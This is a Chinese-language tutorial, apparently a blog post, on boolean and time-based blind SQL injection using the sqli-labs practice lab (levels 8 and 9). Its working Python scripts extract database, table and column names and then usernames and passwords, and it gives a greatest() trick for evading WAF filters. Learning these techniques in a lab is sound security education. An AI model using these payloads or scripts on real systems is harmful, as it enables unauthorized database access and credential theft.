目录

一：基础知识引导

数据库：information_schema里面记录着数据库的所有元信息

二，布尔盲注，时间盲注

（1）布尔盲注案例（以sqli-labs第八关为例）：

（2）时间盲注案例（以sqli-labs第九关为例）：

---

一：基础知识引导

数据库：information_schema里面记录着数据库的所有元信息

use information_schema；

schemata表，记录着所有数据库（schema_name数据库的名称）

select schema_name from schemata;

tables表，记录着所有表（重要字段：table_schema所属的数据库，table_name数据表的名称）

select table_name from tables where table_schema = "security"; 查找数据库”security“的所有表

columns表，记录着所有字段（列）（table_schema所属数据库，table_name数据表的名称,column_name列名称）

select column_name from columns where table_schema="security" and table_name="users";查找数据库为“security”，表为“users”的所有字段名称

二，布尔盲注，时间盲注

特征：

1，其实这两个盲注本质上是一样的，两个盲注都是页面没有回显（报错回显，查询结果回显）

2，布尔盲注是sql执行结果正确和错误显示的页面不一样，可以从返回页面的情况来进行判断。时间盲注则是sql执行结果正确与否显示的页面都一样，但是确实存在sql注入的情况，此时可以使用if(条件,sleep(3),)对是否沉睡三秒来进行判断

（1）布尔盲注案例（以sqli-labs第八关为例）：

可以看到对sql查询有结果的话显示的页面是"You are in..........."，没结果则不显示，此时可以使用sqlmap软件去进行盲注查找，也可以使用sql脚本去遍历查找自己所需的值。

python脚本代码：

import requests# URL = "http://localhost/Less-8/"
# paload = {"id":"1' and ascii(substr(database(),1,1))=115 -- "}
# res = requests.get(url=URL,params=paload)
# if "You are in" in res.text:
#     print("yes")
# else:
#     print("no")
def get_database(URL):# 获取数据库名称s = ""for i in range(1,10):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}#相当于第一个字符<={mid}条件判断为真res = requests.get(url=URL, params=paload)if "You are in" in res.text:hight = midmid = (low + hight) // 2else:low = mid +1mid = (low + hight) // 2s+=chr(mid)print("数据库名称:"+s)def get_table(URL):# 获取表名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}res = requests.get(url=URL, params=paload)if "You are in" in res.text:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("表的名称:"+s)def get_column(URL):# 获取管理员的字段名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}res = requests.get(url=URL, params=paload)if "You are in" in res.text:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("列的名称:"+s)def get_result(URl):# 获取用户名和密码信息s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}res = requests.get(url=URL, params=paload)if "You are in" in res.text:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("用户名及密码信息:"+s)if __name__ == '__main__':URL = "http://localhost/Less-8/"# get_database(URL)# get_table(URL)# get_column(URL)get_result(URL)

执行结果：

这里我只遍历了32位，有需要可以增加。

（2）时间盲注案例（以sqli-labs第九关为例）：

php代码：

可以看出无论sql正确与否，查到或者未查到显示的页面都是一样的，但是还是存在时间盲注：可以用if（1=1，sleep（3），1）测试一下

此时，浏览器上方转圈圈转了三秒，说明存在时间盲注，此时用python脚本遍历的方法大致跟布尔盲注一样，只需要将sql条件注入写到if（）中1=1的位置即可。然后根据浏览器获得页面的前后时间进行判断。

python脚本代码：

import requests
import datetime
# URL = "http://localhost/Less-8/"
# paload = {"id":"1' and ascii(substr(database(),1,1))=115 -- "}
# res = requests.get(url=URL,params=paload)
# if "You are in" in res.text:
#     print("yes")
# else:
#     print("no")
def get_database(URL):# 获取数据库名称s = ""for i in range(1,10):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}#相当于第一个字符<={mid}条件判断为真start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:hight = midmid = (low + hight) // 2else:low = mid +1mid = (low + hight) // 2s+=chr(mid)print("数据库名称:"+s)def get_table(URL):# 获取表名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("表的名称:"+s)def get_column(URL):# 获取管理员的字段名称s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("列的名称:"+s)def get_result(URl):# 获取用户名和密码信息s = ""for i in range(1,32):low = 32hight = 128mid = (low+hight)//2while(hight > low):paload = {"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >=3:low = mid +1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s+=chr(mid)print("用户名及密码信息:"+s)if __name__ == '__main__':URL = "http://localhost/Less-9/"get_database(URL)# get_table(URL)# get_column(URL)# get_result(URL)

结果：

上面两个python脚本代码的第一个获取数据库的函数，sql语句注入用到了greatest函数，可用来绕过过滤掉<>的waf